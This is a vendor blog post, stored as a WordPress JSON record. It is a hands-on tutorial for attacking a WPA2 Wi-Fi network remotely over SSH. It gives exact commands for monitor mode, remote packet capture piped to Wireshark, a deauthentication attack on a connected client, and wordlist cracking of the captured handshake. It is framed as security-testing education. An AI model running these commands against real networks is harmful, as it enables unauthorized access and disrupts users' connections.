{"id":21136,"date":"2024-02-29T17:42:58","date_gmt":"2024-02-29T12:12:58","guid":{"rendered":"https:\/\/www.cigniti.com\/blog\/?p=21136"},"modified":"2024-05-20T15:14:09","modified_gmt":"2024-05-20T09:44:09","slug":"remote-packet-capture-wi-fi-hacking","status":"publish","type":"post","link":"https:\/\/www.cigniti.com\/blog\/remote-packet-capture-wi-fi-hacking\/","title":{"rendered":"Remote Packet Capture: A Deep Dive into Wi-Fi Hacking"},"content":{"rendered":"

As with traditional wired networks and security, WiFi security is also essential to the organization’s setup as it safeguards sensitive data and protects unauthorized access in most critical wireless networks. Hence, it is necessary to perform comprehensive risk assessments and various other pertinent checks concerning the available standards, make note of multiple threats, and amicably address them.<\/p>\n

WiFi hacking refers to the unauthorized access and manipulation of wireless networks for various purposes, including data theft, network disruption, or gaining unauthorized access to sensitive information. This nefarious activity involves exploiting vulnerabilities in WiFi protocols or network configurations to gain entry, often utilizing specialized tools and techniques. While WiFi hacking can pose significant security risks<\/a> to individuals and organizations, understanding these techniques is essential for implementing robust cybersecurity defenses and safeguarding against potential threats.<\/p>\n

In this article, the method for remotely attacking wireless networks accessible from remote locations will be explored. Wi-Fi hacking can be conducted remotely with the aid of specific tools and techniques detailed in the subsequent sections.<\/p>\n

Tools:-<\/h3>\n
    \n
  1. Airmon-ng <\/strong>is a utility used to transition wireless interfaces between monitor mode and standard mode, facilitating the monitoring and capturing of wireless network traffic.<\/li>\n
  2. Airodump-ng<\/strong> is utilized to capture raw 802.11 frames and present detailed information about wireless networks.<\/li>\n
  3. Aircrack-ng<\/strong> is employed for cracking WEP, WPA1, and WPA2 Pre-Shared Key (PSK) networks. Note: This technique requires specific prerequisites.<\/li>\n
  4. Wireshark<\/strong> is a graphical user interface (GUI) packet-capturing tool for storing network traffic locally.<\/li>\n
  5. Tcpdump<\/strong> is a command-line tool employed for capturing wireless frames.<\/li>\n<\/ol>\n

    Requirements:<\/h3>\n
      \n
    1. Alpha card<\/strong> (device with packet injection capability)<\/li>\n
    2. Kali Linux with ssh enabled<\/strong> (remote machine)<\/li>\n
    3. Kali Linux<\/strong> (local machine)<\/li>\n<\/ol>\n

      The approach outlined below explores the remote attacks on wireless networks through SSH (Secure shell) services. An essential requirement is that the Alpha card (a device with packet injection capability) must be connected to the remote Kali machine.<\/p>\n

      Note<\/strong>:- Any device with wireless packet injection enabled can be used.<\/p>\n

      Establishing a connection to the remote machine using SSH services from the local Kali machine is essential.<\/p>\n

      Command:-<\/strong> ssh kali<\/strong>@192.168.29.151<\/strong><\/p>\n

      Checking whether the wireless card is mounted or not<\/p>\n

      Command:-<\/strong> iwconfig<\/p>\n

      Wlan0 \u2013 is our wireless card ( Alpha card )<\/p>\n

      \"\"<\/p>\n

      Now, terminating other processing tasks can be achieved using the following command.<\/p>\n

      Command:-<\/strong>\u00a0 airmon-ng check kill<\/p>\n

      To execute packet injection, transitioning the wireless card into monitor mode is necessary.<\/p>\n

      Command:-<\/strong> airmon-ng start wlan0<\/p>\n

      \"\"<\/p>\n

      The monitoring mode has been successfully enabled on the wireless card.<\/p>\n

      The additional details (such as BSSID, SSID, Channel Number, Authentication Type, Encryption Type, and connected Clients) associated with the target network need to be gathered as follows:<\/p>\n

      Target Network is:- Evil-corp<\/strong><\/p>\n

      \"\"<\/p>\n

      The details of the target network have been obtained, as shown in the image below.<\/p>\n

      \"\"<\/p>\n

      In another terminal window<\/p>\n

      The remote listening<\/strong> using Wireshark <\/strong>needs to be initiated with the assistance of tcpdump to capture remote wireless traffic.<\/p>\n

      The tcpdump is being executed on the wireless interface of the remote machine, and captured traffic is being redirected to the local machine using the command below. Essentially, the output of the tcpdump tool is being inputted to the Wireshark tool.<\/p>\n

      Command:-<\/strong>
      \nsudo ssh kali@192.168.29.151 “sudo -S tcpdump -U -w – -i wlan0mon” | wireshark -k – -i<\/strong><\/p>\n

      192.168.29.151 \u2013 remote Kali IP<\/p>\n

      \"192.168.29.151<\/p>\n

      Wireshark will open after executing the above command, but the traffic might not be immediately observed.<\/p>\n

      \"\"<\/p>\n

      The password of the remote machine needs to be entered, as shown below.<\/p>\n

      \"\"<\/p>\n

      After entering the password, the traffic flow originating from the wireless card interface of the remote Kali machine will be observed as follows.<\/p>\n

      \"\"<\/p>\n

      The target details would be now used to perform an attack on the target network as follows-<\/p>\n

      Command:-<\/strong>\u00a0 airodump-ng –bssid C4:E9:0A:5B:CD:4D<\/strong> -c 9<\/strong> -w test<\/strong> wlan0mon<\/p>\n

      C4:E9:0A:5B:CD:4D<\/strong> \u2013 target bssid<\/p>\n

      9<\/strong> \u2013 The target network is running on Channel no 9<\/p>\n

      test<\/strong> \u2013 The captured file would be saved in the name of the test.<\/strong><\/p>\n

      The attack on the target network has been launched successfully.<\/p>\n

      The client device getting connected to the target AP can be observed as follows<\/p>\n

      \"\"<\/p>\n

      Open a new<\/strong> terminal and connect to the remote machine<\/p>\n

      The De-authentication attack needs to be executed to capture the handshake.<\/p>\n

      The aireplay-ng<\/strong> tool needs to be utilized to execute the De-authentication<\/strong> attack.<\/p>\n

      Command:- <\/strong>aireplay-ng -0 1<\/strong> -a C4:E9:0A:5B:CD:4D<\/strong> -c 3E:E7:79:AF:C5:A9<\/strong> wlan0mon<\/p>\n

      C4:E9:0A:5B:CD:4D \u2013 <\/strong>the target AP bssid<\/p>\n

      3E:E7:79:AF:C5:A9 \u2013 <\/strong>the target AP client mac address<\/p>\n

      -0\u00a0 –\u00a0 <\/strong>setting up the aireplay-ng to perform a de-auth attack<\/p>\n

      1\u00a0\u00a0 – <\/strong>Number of de-auth packets<\/p>\n

      \"\"<\/p>\n

      The de-authentication attack has been performed, continually executed at regular intervals of 15 seconds, until the \u201cWPA handshake\u201d<\/strong> gets captured.<\/p>\n

      The successful capture of WPA handshake is as follows –<\/p>\n

      \"\"<\/p>\n

      The process needs to be terminated by pressing Ctrl+C<\/strong><\/p>\n

      Navigate to Wireshark and stop the process by clicking on the STOP button (red color button). The captured data needs<\/strong> to be saved to proceed with the password cracking.<\/p>\n

      From the wireshark dashboard, click on\u00a0 File<\/strong>>click on Save As > <\/strong>Save the file as .pcap<\/strong> extension<\/p>\n

      Saved the captured file as \u201cevilcorp.pcap<\/strong>\u201d<\/p>\n

      The .pcap<\/strong> file type is a supported format for the aircrack-ng <\/strong>tool<\/p>\n

      To crack the password of the target network, The aircrack-ng<\/strong> tool needs to be utilized. The password-cracking would be commenced by executing the following command:<\/p>\n

      Command:- <\/strong>
      \nsudo aircrack-ng -w \/usr\/share\/john\/password.lst<\/strong> –bssid C4:E9:0A:5B:CD:4D<\/strong> evilcorp.pcap<\/strong><\/p>\n

      \/usr\/share\/john\/password.lst \u2013 <\/strong>The wordlist that would be employed for cracking the password<\/p>\n

      C4:E9:0A:5B:CD:4D \u2013 <\/strong>target networdk bssid<\/p>\n

      evilcorp.pcap<\/strong>\u00a0 – WPA handshake captured file<\/p>\n

      \"\"<\/p>\n

      After executing the command, There is some wait time for the password-cracking process to complete.<\/p>\n

      \"\"<\/p>\n

      The password has been successfully cracked. The password for the target network is “password<\/strong>“.<\/p>\n

      Note<\/strong>:- Sometimes, default wordlists may not be sufficient for cracking passwords. In such cases, custom wordlists can be used or generated using tools like Crunch<\/strong> and John the Ripper<\/strong>.<\/p>\n

      To crack the password using a hashcat with the assistance of a GPU, the format of .pcap needs to be converted to some other supported by a hashcat.<\/p>\n

      Conclusion<\/h3>\n

      Cigniti offers a wide variety of services with regards to wireless security through a wide range of initiatives, including assessments and other activities, and provides the necessary support to corporates and other clients to improve the overall security posture and ensure robust networks are in place, which makes the network infrastructure immune to various attack vectors, which are constantly evolving. Enhancements in testing strategy<\/a> adapted to detect new attack patterns and methods and remediation measures are also suggested in the path of continuous improvement.<\/p>\n

      Need help? Schedule a call<\/a> with our Security Testing<\/a> experts to learn about Wi-Fi hacking using remote packet capture.<\/p>\n","protected":false},"excerpt":{"rendered":"

      As with traditional wired networks and security, WiFi security is also essential to the organization’s setup as it safeguards sensitive data and protects unauthorized access in most critical wireless networks. Hence, it is necessary to perform comprehensive risk assessments and various other pertinent checks concerning the available standards, make note of multiple threats, and amicably […]<\/p>\n","protected":false},"author":20,"featured_media":21137,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[5474,5467,5476,5477,1298,5471,5473,5465,498,5470,5469,5466,5468,5475,5472],"ppma_author":[5464],"class_list":["post-21136","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security-testing","tag-aircrack-ng","tag-cybersecurity-defense","tag-de-authentication-attack","tag-hashcat","tag-network-security","tag-packet-injection","tag-password-cracking","tag-remote-packet-capture","tag-security-testing","tag-ssh-services","tag-vulnerability-exploitation","tag-wi-fi-hacking","tag-wireless-networks","tag-wireshark-analysis","tag-wpa-handshake-capture"],"authors":[{"term_id":5464,"user_id":0,"is_guest":1,"slug":"venkata-harish-bathula","display_name":"Venkata Harish Bathula","avatar_url":{"url":"https:\/\/www.cigniti.com\/blog\/wp-content\/uploads\/2024\/02\/Venkata-Harish-Bathula.jpeg","url2x":"https:\/\/www.cigniti.com\/blog\/wp-content\/uploads\/2024\/02\/Venkata-Harish-Bathula.jpeg"},"user_url":"https:\/\/www.cigniti.com\/blog\/","last_name":"Bathula","first_name":"Venkata Harish","job_title":"","description":"Harish has over 5 years of hands-on experience in cybersecurity assessments, covering DAST, MAST, SAST, NPT, and API evaluations, along with expertise in finetuning various commercial and opensource tools and custom configuration to achieve speed and quality on par and as per the business requirements. Currently serving as a Senior Security Researcher at Cigniti Technologies, is a passionate technology blogger with Wi-Fi and other cybersecurity certifications."}],"_links":{"self":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts\/21136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/users\/20"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/comments?post=21136"}],"version-history":[{"count":0,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/posts\/21136\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/media\/21137"}],"wp:attachment":[{"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/media?parent=21136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/categories?post=21136"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/tags?post=21136"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.cigniti.com\/blog\/wp-json\/wp\/v2\/ppma_author?post=21136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}